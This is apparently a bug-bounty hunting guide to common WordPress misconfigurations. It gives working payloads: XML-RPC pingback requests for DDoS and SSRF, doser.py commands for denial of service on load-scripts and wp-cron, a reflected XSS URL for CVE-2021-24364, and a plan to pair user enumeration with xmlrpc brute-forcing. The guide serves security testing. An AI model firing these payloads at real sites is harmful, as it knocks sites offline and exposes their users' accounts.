Wordpress

Wordpress Common Misconfiguration

Here I will try my best to cover all the common WordPress security misconfigurations I have seen before or that are officially referenced. I will attach a PoC and references for each as well.

Index

  • Wordpress Detection

  • General Scan Tool

  • xmlrpc.php

  • Directory listing

  • CVE-2018-6389

  • CVE-2021-24364

  • WP Cronjob DoS

  • WP User Enumeration

Wordpress Detection

Well, if you are reading this you already know about technology detection tools and methods. Still, adding them below:

  • Wappalyzer

  • WhatRuns

  • BuiltWith

General Scan Tool

  • WpScan

xmlrpc.php

This is one of the most common issues on WordPress. To get paid for this misconfiguration you have to exploit it fully and demonstrate the impact properly as well.

Detection

  • visit site.com/xmlrpc.php

  • Get the error message about POST request only

Exploit

  • Intercept the request and change the method GET to POST

  • List all Methods

    <methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
    </methodCall>
  • Check whether the pingback.ping method is there or not

  • Perform DDoS

    <methodCall>
    <methodName>pingback.ping</methodName>
    <params><param>
    <value><string>http://<YOUR SERVER >:<port></string></value>
    </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
    </value></param></params>
    </methodCall>
  • Perform SSRF (Internal PORT scan only)

    <methodCall>
    <methodName>pingback.ping</methodName>
    <params><param>
    <value><string>http://<YOUR SERVER >:<port></string></value>
    </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
    </value></param></params>
    </methodCall>

Tool to automate this check: XMLRPC-Scan.

References

Directory listing

Sometimes developers forget to disable directory listing on /wp-content/uploads, so this is a common issue on WordPress sites.

Detection

/wp-content/uploads

Pro tip

Add this path to your fuzzing wordlist

References

CVE-2018-6389

This issue can take down any WordPress site below version 4.9.3, so while reporting make sure that your target website is running a WordPress version under 4.9.3.

Detection

Use the URL from my gist called loadsxploit; you will get a massive amount of JS data in the response.

Exploit

You can use any DoS tool. I found Doser really fast; it shut down the web server within 30 seconds.

python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'

References

CVE-2021-24364

The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

Detection and Exploit

  • Replace <Your_WP-Site-here> with your WP site in the following URL and open it:

    <Your_WP-Site-here>/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D

  • Wait for the pop-up!

Reference

WP Cronjob DoS

This is another area where you can perform a DoS attack.

Detection

  • visit site.com/wp-cron.php

  • You will see a blank page with a 200 HTTP status code

Exploit

You can use the same tool, Doser, to exploit this:

python3 doser.py -t 999 -g 'https://site.com/wp-cron.php'

Reference

WP User Enumeration

This issue is only acceptable when the target website hides its current users or they are not publicly available, since an attacker can use that user data for brute-forcing and other attacks.

Detection

  • visit site.com/wp-json/wp/v2/users/

  • You will see JSON data with user info in the response

Exploit

If both xmlrpc.php and this user enumeration are present, you can chain them: collect usernames from wp-json and brute-force them via xmlrpc.php. This shows extra effort and increases the impact as well.
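As an added example (not part of the HowToHunt page or any tool it links), the parsers below turn the two raw responses the xmlrpc.php and WP User Enumeration checks produce into a yes/no answer, so the same checks can be run against your own sites during an audit. The sample bodies are constructed, not captured from a real site, and the WP_Error-shaped JSON for a closed users endpoint is an assumption about the error format.

```python
import json
import xml.etree.ElementTree as ET

# Constructed sample bodies (not captured from any real site).
SAMPLE_LIST_METHODS = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""

SAMPLE_FAULT = """<?xml version="1.0"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>405</int></value></member>
<member><name>faultString</name><value><string>disabled</string></value></member>
</struct></value></fault></methodResponse>"""

SAMPLE_USERS = '[{"id": 1, "name": "Site Admin", "slug": "admin"}, {"id": 2, "slug": "editor"}]'
# Assumed shape of a closed endpoint: a WP_Error-style object instead of an array.
SAMPLE_USERS_CLOSED = '{"code": "rest_cannot_access", "message": "x", "data": {"status": 401}}'


def build_list_methods_request() -> bytes:
    """Body for the system.listMethods call the page POSTs to xmlrpc.php."""
    call = ET.Element("methodCall")
    ET.SubElement(call, "methodName").text = "system.listMethods"
    ET.SubElement(call, "params")
    return ET.tostring(call, encoding="utf-8", xml_declaration=True)


def parse_list_methods(body: str) -> list[str]:
    """Method names from a methodResponse; [] when the site answers with a
    <fault> (WordPress does this when XML-RPC is disabled)."""
    root = ET.fromstring(body)
    if root.find("fault") is not None:
        return []
    return [v.text for v in root.iterfind("params/param/value/array/data/value/string")]


def pingback_exposed(body: str) -> bool:
    """True when pingback.ping (the DDoS/SSRF method above) is offered."""
    return "pingback.ping" in parse_list_methods(body)


def enumerated_users(body: str) -> list[str]:
    """Login slugs leaked by /wp-json/wp/v2/users/; [] when the endpoint
    returns an error object instead of a user array."""
    data = json.loads(body)
    if not isinstance(data, list):
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]
```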

Reference

Researcher Note

Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look at while testing for other vulnerabilities, and most of the time they work well for chaining with other low-severity bugs.

Author

Name: Mehedi Hasan Remon


Last updated 3 years ago

Handle: @remonsec